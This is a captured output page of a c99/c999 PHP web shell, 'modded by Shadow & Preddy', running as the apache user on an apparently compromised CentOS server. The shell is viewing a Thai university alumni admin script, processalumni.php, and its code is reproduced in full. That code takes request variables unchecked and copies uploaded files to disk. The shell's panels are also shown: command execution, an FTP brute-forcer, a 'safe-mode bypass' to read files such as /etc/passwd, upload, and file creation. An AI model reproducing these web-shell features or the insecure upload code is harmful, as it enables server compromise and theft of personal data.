!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/ealumni/admin/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     processalumni.php (11.96 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "../../class/clsConnection.php";
include_once 
"../../class/clsDB.php";
include_once 
"../global.php";
include_once 
"../class/clshisaword.php";
include_once 
"../class/clshiswork.php";
include_once 
"../class/clsalumnibio.php";
include_once 
"../class/clsalumnimain.php";
include_once 
"../link/function.php";

$oHa = new HisAword($oC1);
$oHw = new HisWork($oC1);
$oAb = new AlumniBio($oC1);
$oAm = new AlumniMain($oC1);
if(
$status == "1" || $status == "")
{
    
$oAb->SearchByKey($alumniId);
    
$oAb->GetRecord();
    
$oAb->Edit();
    
$oAb->alumniId=$alumniId;
    
$oAb->studentId=$oAb->studentId;
    
$oAb->nationId=$nationId;
    
$oAb->religionId=$religionId;
    
$oAb->bloodGroup=$bloodGroup;
    
$oAb->birthDate=splitDateForm($birthDate,"/");
    
$oAb->birthProvinceId=$oAb->birthProvinceId;
    
$oAb->homeAddress=$oAb->homeAddress;
    
$oAb->homeDistrictId=$oAb->homeDistrictId;
    
$oAb->homeAmphurId=$oAb->homeAmphurId;
    
$oAb->homeProvinceId=$oAb->homeProvinceId;
    
$oAb->homeZipcode=$oAb->homeZipcode;
    
$oAb->homePhoneNo=$oAb->homePhoneNo;
    
$oAb->officeName=$oAb->officeName;
    
$oAb->officeAddress=$oAb->officeAddress;
    
$oAb->officeDistrictId=$oAb->officeDistrictId;
    
$oAb->officeAmphurId=$oAb->officeAmphurId;
    
$oAb->officeProvinceId=$oAb->officeProvinceId;
    
$oAb->officeZipcode=$oAb->officeZipcode;
    
$oAb->officePhoneNo=$oAb->officePhoneNo;
    
$oAb->workingStatus=$oAb->workingStatus;
    
$oAb->workingPosition=$oAb->workingPosition;
    
$oAb->workingSalary=$oAb->workingSalary;
    
$oAb->fatherName=$oAb->fatherName;
    
$oAb->fatherAddress=$oAb->fatherAddress;
    
$oAb->fatherDistrictId=$oAb->fatherDistrictId;
    
$oAb->fatherAmphurId=$oAb->fatherAmphurId;
    
$oAb->fatherProvinceId=$oAb->fatherProvinceId;
    
$oAb->fatherZipcode=$oAb->fatherZipcode;
    
$oAb->fatherPhoneNo=$oAb->fatherPhoneNo;
    
$oAb->fatherOccupation=$oAb->fatherOccupation;
    
$oAb->fatherStatus=$oAb->fatherStatus;
    
$oAb->motherName=$oAb->motherName;
    
$oAb->motherAddress=$oAb->motherAddress;
    
$oAb->motherDistrictId=$oAb->motherDistrictId;
    
$oAb->motherAmphurId=$oAb->motherAmphurId;
    
$oAb->motherProvinceId=$oAb->motherProvinceId;
    
$oAb->motherZipcode=$oAb->motherZipcode;
    
$oAb->motherPhoneNo=$oAb->motherPhoneNo;
    
$oAb->motherOccupation=$oAb->motherOccupation;
    
$oAb->motherStatus=$oAb->motherStatus;
    
$oAb->studentSex=$oAb->studentSex;
    
$oAb->parentName=$oAb->parentName;
    
$oAb->parentRelation=$oAb->parentRelation;
    
$oAb->parentAddress=$oAb->parentAddress;
    
$oAb->parentDistrictId=$oAb->parentDistrictId;
    
$oAb->parentAmphurId=$oAb->parentAmphurId;
    
$oAb->parentProvinceId=$oAb->parentProvinceId;
    
$oAb->parentZipcode=$oAb->parentZipcode;
    
$oAb->parentPhoneNo=$oAb->parentPhoneNo;
    
$oAb->parentMobile=$oAb->parentMobile;
    
$oAb->parentOcc=$oAb->parentOcc;
    
$oAb->parentIncome=$oAb->parentIncome;
    
$oAb->parentEmail=$oAb->parentEmail;
    
$oAb->contactPerson=$oAb->contactPerson;
    
$oAb->contactAddress=$oAb->contactAddress;
    
$oAb->contactDistrictId=$oAb->contactDistrictId;
    
$oAb->contactAmphurId=$oAb->contactAmphurId;
    
$oAb->contactProvinceId=$oAb->contactProvinceId;
    
$oAb->contactZipcode=$oAb->contactZipcode;
    
$oAb->contactPhoneNo=$oAb->contactPhoneNo;
    
$oAb->cardExpiryDate=$oAb->cardExpiryDate;
    
$oAb->currentAddress=$oAb->currentAddress;
    
$oAb->currentDistrictId=$oAb->currentDistrictId;
    
$oAb->currentAmphurId=$oAb->currentAmphurId;
    
$oAb->currentProvinceId=$oAb->currentProvinceId;
    
$oAb->currentZipcode=$oAb->currentZipcode;
    
$oAb->currentPhoneNo=$oAb->currentPhoneNo;
    
$oAb->graduateAddress=$oAb->graduateAddress;
    
$oAb->graduateDistrictId=$oAb->graduateDistrictId;
    
$oAb->graduateAmphurId=$oAb->graduateAmphurId;
    
$oAb->graduateProvinceId=$oAb->graduateProvinceId;
    
$oAb->graduateZipcode=$oAb->graduateZipcode;
    
$oAb->graduatePhoneNo=$oAb->graduatePhoneNo;
    
$oAb->maritalStatusId=$oAb->maritalStatusId;
    
$oAb->weight=$oAb->weight;
    
$oAb->height=$oAb->height;
    
    
// Picture
    
$rootdir "../picturePerson";
    
$picturePath="$rootdir/".$uploadfile_name;            
    
copy($uploadfile,$picturePath);
        
    if(
$picturePath=='../picturePerson/'){
    
//$picturePath='../pictureStud/photo.gif';
        
$picturePath=$picturePerson;
    }
    if(
$picturePath == "")
        
$oAb->picturePath=$oAb->picturePath;
    else
        
$oAb->picturePath=$picturePath;
    
$oAb->recruitmentTypeId=$oAb->recruitmentTypeId;
    
$oAb->occExamResult=$oAb->occExamResult;
    
$oAb->canRefund=$oAb->canRefund;
    
$oAb->oldStudentName=$oAb->oldStudentName;
    
$oAb->entryDegree=$oAb->entryDegree;
    
$oAb->healthPrivId=$oAb->healthPrivId;
    
$oAb->o1prefixId=$o1prefixId;
    
$oAb->o1fName=$o1fName;
    
$oAb->o1lName=$o1lName;
    
$oAb->o2prefixId=$o2prefixId;
    
$oAb->o2fName=$o2fName;
    
$oAb->o2lName=$o2lName;

    
$oAb->Save();
    
    
$oAm->SearchByKey($alumniId);
    
$oAm->GetRecord();
    
$oAm->Edit();
    
$oAm->alumniId=$alumniId;
    
$oAm->studentId=$oAm->studentId;
    
$oAm->studentCode=$oAm->studentCode;
    
$oAm->levelId=$oAm->levelId;
    
$oAm->programId=$programId;
    
$oAm->prefixId=$prefixId;
    
$oAm->studentName=$studentName;
    
$oAm->studentSurname=$studentSurname;
    
$oAm->studentNameEng=$studentNameEng;
    
$oAm->studentSurnameEng=$studentSurnameEng;
    
$oAm->creditAttempt=$oAm->creditAttempt;
    
$oAm->creditSatisfy=$oAm->creditSatisfy;
    
$oAm->GPA=$oAm->GPA;
    
$oAm->admitAcadYear=$admitAcadYear;
    
$oAm->admitSemester=$oAm->admitSemester;
    
$oAm->admitDate=splitDateForm($admitDate,"/");
    
$oAm->finishDate=splitDateForm($finishDate,"/");
    
$oAm->studentPassword=$oAm->studentPassword;
    
$oAm->studentEmail=$studentEmail;
    
$oAm->studentYear=$oAm->studentYear;
    
$oAm->studentStatus=$oAm->studentStatus;
    
$oAm->officerId1=$oAm->officerId1;
    
$oAm->officerId2=$oAm->officerId2;
    
$oAm->financeStatus=$oAm->financeStatus;
    
$oAm->updateUserId=$oAm->updateUserId;
    
$oAm->updateDateTime=$oAm->updateDateTime;
    
$oAm->citizenId=$citizenId;
    
$oAm->graduateYear=$oAm->graduateYear;
    
$oAm->genStatus=$oAm->genStatus;
    
$oAm->genNo=$oAm->genNo;
    
$oAm->entryTypeId=$oAm->entryTypeId;
    
$oAm->entryTypeId2=$oAm->entryTypeId2;
    
$oAm->studentSex=$studentSex;
    
$oAm->scholarId=$oAm->scholarId;
    
$oAm->preAdmitPositionId=$oAm->preAdmitPositionId;
    
$oAm->totalPoint=$oAm->totalPoint;
    
$oAm->honor=$oAm->honor;
    
$oAm->medal=$oAm->medal;
    
$oAm->exitExam=$oAm->exitExam;
    
$oAm->studentStatusTmp=$oAm->studentStatusTmp;
    
$oAm->importtoalumni=$oAm->importtoalumni;
    
$oAm->glantId=$oAm->glantId;
    
$oAm->glantDate=$oAm->glantDate;
    
$oAm->glantreqDate=$oAm->glantreqDate;
    
$oAm->finishAcadYear=$finishAcadYear;
    
    
$oAm->Save();
}
if(
$status == "2")
{
    
$oAb->SearchByKey($alumniId);
    
$oAb->GetRecord();
    
$oAb->Edit();
    
$oAb->alumniId=$alumniId;
    
$oAb->studentId=$oAb->studentId;
    
$oAb->nationId=$oAb->nationId;
    
$oAb->religionId=$oAb->religionId;
    
$oAb->bloodGroup=$oAb->bloodGroup;
    
$oAb->birthDate=$oAb->birthDate;
    
$oAb->birthProvinceId=$oAb->birthProvinceId;
    
$oAb->homeAddress=$homeAddress;
    
$oAb->homeDistrictId=$homeDistrictId;
    
$oAb->homeAmphurId=$homeAmphurId;
    
$oAb->homeProvinceId=$homeProvinceId;
    
$oAb->homeZipcode=$homeZipcode;
    
$oAb->homePhoneNo=$homePhoneNo;
    
$oAb->officeName=$officeName;
    
$oAb->officeAddress=$officeAddress;
    
$oAb->officeDistrictId=$officeDistrictId;
    
$oAb->officeAmphurId=$officeAmphurId;
    
$oAb->officeProvinceId=$officeProvinceId;
    
$oAb->officeZipcode=$officeZipcode;
    
$oAb->officePhoneNo=$officePhoneNo;
    
$oAb->workingStatus=$oAb->workingStatus;
    
$oAb->workingPosition=$oAb->workingPosition;
    
$oAb->workingSalary=$oAb->workingSalary;
    
$oAb->fatherName=$oAb->fatherName;
    
$oAb->fatherAddress=$oAb->fatherAddress;
    
$oAb->fatherDistrictId=$oAb->fatherDistrictId;
    
$oAb->fatherAmphurId=$oAb->fatherAmphurId;
    
$oAb->fatherProvinceId=$oAb->fatherProvinceId;
    
$oAb->fatherZipcode=$oAb->fatherZipcode;
    
$oAb->fatherPhoneNo=$oAb->fatherPhoneNo;
    
$oAb->fatherOccupation=$oAb->fatherOccupation;
    
$oAb->fatherStatus=$oAb->fatherStatus;
    
$oAb->motherName=$oAb->motherName;
    
$oAb->motherAddress=$oAb->motherAddress;
    
$oAb->motherDistrictId=$oAb->motherDistrictId;
    
$oAb->motherAmphurId=$oAb->motherAmphurId;
    
$oAb->motherProvinceId=$oAb->motherProvinceId;
    
$oAb->motherZipcode=$oAb->motherZipcode;
    
$oAb->motherPhoneNo=$oAb->motherPhoneNo;
    
$oAb->motherOccupation=$oAb->motherOccupation;
    
$oAb->motherStatus=$oAb->motherStatus;
    
$oAb->studentSex=$oAb->studentSex;
    
$oAb->parentName=$oAb->parentName;
    
$oAb->parentRelation=$oAb->parentRelation;
    
$oAb->parentAddress=$oAb->parentAddress;
    
$oAb->parentDistrictId=$oAb->parentDistrictId;
    
$oAb->parentAmphurId=$oAb->parentAmphurId;
    
$oAb->parentProvinceId=$oAb->parentProvinceId;
    
$oAb->parentZipcode=$oAb->parentZipcode;
    
$oAb->parentPhoneNo=$oAb->parentPhoneNo;
    
$oAb->parentMobile=$oAb->parentMobile;
    
$oAb->parentOcc=$oAb->parentOcc;
    
$oAb->parentIncome=$oAb->parentIncome;
    
$oAb->parentEmail=$oAb->parentEmail;
    
$oAb->contactPerson=$oAb->contactPerson;
    
$oAb->contactAddress=$oAb->contactAddress;
    
$oAb->contactDistrictId=$oAb->contactDistrictId;
    
$oAb->contactAmphurId=$oAb->contactAmphurId;
    
$oAb->contactProvinceId=$oAb->contactProvinceId;
    
$oAb->contactZipcode=$oAb->contactZipcode;
    
$oAb->contactPhoneNo=$oAb->contactPhoneNo;
    
$oAb->cardExpiryDate=$oAb->cardExpiryDate;
    
$oAb->currentAddress=$currentAddress;
    
$oAb->currentDistrictId=$currentDistrictId;
    
$oAb->currentAmphurId=$currentAmphurId;
    
$oAb->currentProvinceId=$currentProvinceId;
    
$oAb->currentZipcode=$currentZipcode;
    
$oAb->currentPhoneNo=$currentPhoneNo;
    
$oAb->graduateAddress=$oAb->graduateAddress;
    
$oAb->graduateDistrictId=$oAb->graduateDistrictId;
    
$oAb->graduateAmphurId=$oAb->graduateAmphurId;
    
$oAb->graduateProvinceId=$oAb->graduateProvinceId;
    
$oAb->graduateZipcode=$oAb->graduateZipcode;
    
$oAb->graduatePhoneNo=$oAb->graduatePhoneNo;
    
$oAb->maritalStatusId=$oAb->maritalStatusId;
    
$oAb->weight=$oAb->weight;
    
$oAb->height=$oAb->height;
    
$oAb->picturePath=$oAb->picturePath;
    
$oAb->recruitmentTypeId=$oAb->recruitmentTypeId;
    
$oAb->occExamResult=$oAb->occExamResult;
    
$oAb->canRefund=$oAb->canRefund;
    
$oAb->oldStudentName=$oAb->oldStudentName;
    
$oAb->entryDegree=$oAb->entryDegree;
    
$oAb->healthPrivId=$oAb->healthPrivId;
    
$oAb->o1prefixId=$oAb->o1prefixId;
    
$oAb->o1fName=$oAb->o1fName;
    
$oAb->o1lName=$oAb->o1lName;
    
$oAb->o2prefixId=$oAb->o2prefixId;
    
$oAb->o2fName=$oAb->o2fName;
    
$oAb->o2lName=$oAb->o2lName;

    
$oAb->Save();
}
if(
$status=="3")
{
    if(
$method!="edited" && $method!="delete")
    {
        
$oHw->AddNew();
        
$oHw->seqId=$oHw->GetNextCode();
        
$oHw->alumniId=$alumniId;
        
$oHw->companyNameT=$companyNameT;
        
$oHw->companyNameE=$companyNameE;
        
$oHw->companyAddr=$companyAddr;
        
$oHw->companyPosition=$companyPosition;
        
$oHw->companyAdmidPosYear=$companyAdmidPosYear;
    
        
$oHw->Save();
    }
    else if(
$method=="edited")
    { 
        
$oHw->SearchByKey($seqId);
        
$oHw->GetRecord();
        
$oHw->Edit();
        
$oHw->seqId=$seqId;
        
$oHw->alumniId=$alumniId;
        
$oHw->companyNameT=$companyNameT;
        
$oHw->companyNameE=$companyNameE;
        
$oHw->companyAddr=$companyAddr;
        
$oHw->companyPosition=$companyPosition;
        
$oHw->companyAdmidPosYear=$companyAdmidPosYear;
    
        
$oHw->Save();
    }
    else if(
$method=="delete")
    {
        
$oHw->SearchByKey($seqId);
        
$oHw->GetRecord();
    
        
$oHw->Delete();
    }
}
else if(
$status=="4")
{
    if(
$method!="edited" && $method!="delete")
    {
        
$oHa->AddNew();
        
$oHa->seqId=$oHa->GetNextCode();
        
$oHa->alumniId=$alumniId;
        
$oHa->awordNameT=$awordNameT;
        
$oHa->awordNameE=$awordNameE;
        
$oHa->awordCompany=$awordCompany;
        
$oHa->typeawordId=$typeawordId;
        
$oHa->levelawordId=$levelawordId;
        
$oHa->awordYear=$awordYear;
    
        
$oHa->Save();
    }
    else if(
$method=="edited")
    {
        
$oHa->SearchByKey($seqId);
        
$oHa->GetRecord();
        
$oHa->Edit();
        
$oHa->seqId=$seqId;
        
$oHa->alumniId=$alumniId;
        
$oHa->awordNameT=$awordNameT;
        
$oHa->awordNameE=$awordNameE;
        
$oHa->awordCompany=$awordCompany;
        
$oHa->typeawordId=$typeawordId;
        
$oHa->levelawordId=$levelawordId;
        
$oHa->awordYear=$awordYear;
    
        
$oHa->Save();
    }
    else if(
$method=="delete")
    {
        
$oHa->SearchByKey($seqId);
        
$oHa->GetRecord();
    
        
$oHa->Delete();
    }
}

 echo 
"<meta http-equiv='refresh' content='0; URL=mainalumni.php?alumniId=$alumniId&status=$status&method=$method'>";

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0209 ]--